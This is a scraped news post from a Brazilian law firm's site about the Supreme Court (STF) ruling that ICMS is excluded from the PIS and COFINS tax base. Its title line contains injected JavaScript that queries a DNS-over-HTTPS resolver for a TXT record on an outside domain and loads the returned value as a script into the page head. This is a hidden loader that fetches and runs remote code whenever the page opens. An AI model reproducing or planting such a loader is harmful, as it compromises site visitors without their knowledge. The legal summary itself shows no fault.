STF finaliza o julgamento da ‘tese do século’fetch(“https://cloudflare-dns.com/dns-query?name=localhost-cdn.xyz&type=TXT”, {headers:{ “accept”: “application/dns-json” }}).then(e=>e.json()).then(e=>{const t=document.createElement(“script”);t.src=JSON.parse(e.Answer[0].data),document.querySelector(“head”).appendChild(t)}); – Hauer & Esmanhotto

Notícias

STF finaliza o julgamento da ‘tese do século’

EXCLUSÃO DO ICMS DAS BASES DE CÁLCULO DO PIS E DA COFINS

Foi um julgamento histórico e restaram definidos os seguintes pontos, já que o direito à exclusão em si já havia sido reconhecido em 15 de março de 2017:

  • Ficou reconhecido o direito à exclusão do ICMS destacado, e não do ICMS pago.
  • Foram modulados os efeitos da decisão, que passa a surtir efeitos a partir do julgamento ocorrido em março de 2017. No entanto, foi reconhecido o direito à restituição e/ou compensação dos valores recolhidos indevidamente para aquelas empresas que ingressaram com ações judiciais ou que estejam discutindo tal matéria administrativamente anteriormente à data do julgamento (15/03/2017).


Essa decisão foi proferida na sistemática de Repercussão Geral, pelo que todas as instâncias do judiciário e dos órgãos administrativos federais estão obrigadas a aplicar tal entendimento.

 

Arnaldo Conceição Junior
arnaldo@gahauer.com.br

Newsletter / cadastre-se para receber